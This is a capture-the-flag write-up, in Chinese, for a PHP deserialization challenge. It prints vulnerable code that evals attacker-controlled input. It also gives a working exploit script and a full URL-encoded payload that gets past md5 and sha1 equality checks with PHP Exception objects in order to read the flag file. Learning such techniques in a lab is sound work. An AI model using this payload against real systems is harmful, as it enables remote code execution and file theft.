成理信安協會題目反序列化02

阿新 • • 發佈：2020-10-07

明面上看著不可能的題一般就預示著有空子可鑽。

直接上原始碼###

 <?php
show_source(__FILE__);
class CDUTSEC
{
    public $var1;
    public $var2;

    function __construct($var1, $var2)
    {
        $var1 = $var1;
        $var2 = $var2;
    }

    function __destruct()
    {
        echo md5($this->var1);
        echo md5($this->var2);
        if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2))) {
            eval($this->var1);
        }
    }
}

unserialize($_GET['payload']);

程式碼審計###

一看，很好嘛，兩個變數原值弱比較不同但md5與sha1編碼後要求強比較相等。想到陣列繞過，但是eval執行的需要是字串，陣列轉為字串後就只剩下：Array 了，顯然陣列繞過行不通，在加上這邊同時使用了MD5 和 sha1 我們想要利用 fastcoll 來碰撞也不行了。怎麼搞？
無內鬼，直接祭出大佬部落格

利用 Exception類繞過md5 sha1 等系列 https://mayi077.gitee.io/2020/08/14/%E5%88%A9%E7%94%A8-Exception%E7%B1%BB-%E7%BB%95%E8%BF%87md5-sha1-%E7%AD%89%E7%B3%BB%E5%88%97/

然後根據部落格寫出的指令碼：###

<?php
class CDUTSEC
{
    public $var1;
    public $var2;

    // function __construct($a, $b)
    // {
    //     $var1 = $var1;
    //     $var2 = $var2;
    // }

    // function __destruct()
    // {
    //     echo md5($this->var1);
    //     echo md5($this->var2);
    //     if (($this->var1 != $this->var2) && (md5($this->var1) === md5($this->var2)) && (sha1($this->var1) === sha1($this->var2)))
    //     {                
    //         eval($this->var1);
    //     }
    // }
} 

$cmd="readfile('/flag');?>";
$a = new Exception($cmd);$b = new Exception($cmd,1);

$tr = new CDUTSEC();
$tr->var1=$a;
$tr->var2=$b;
echo urlencode(serialize($tr));

這裡要urlencode的原因是直接序列化的字串有些在文字下是亂碼。url編碼一下保證我們拿到的payload不丟失不出錯。

另外，本題ban了幾個常用的拿flag的函式，我們傳入的命令在$cmd處修改，建議先傳'phpinfo();?>'，一來成不成功好分辨，二來看看有沒有ban常用函式。

最後我們用readfile函式讀到flag。

payload:O%3A7%3A%22CDUTSEC%22%3A2%3A%7Bs%3A4%3A%22var1%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7Ds%3A4%3A%22var2%22%3BO%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A20%3A%22readfile%28%27%2Fflag%27%29%3B%3F%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A48%3A%22D%3A%5Cphpstudy_pro%5CWWW%5CCTFphp%5C%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%A2%9802.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A24%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D%7D

沒啥好說的，刷的題中積累的小知識點而已。(笑)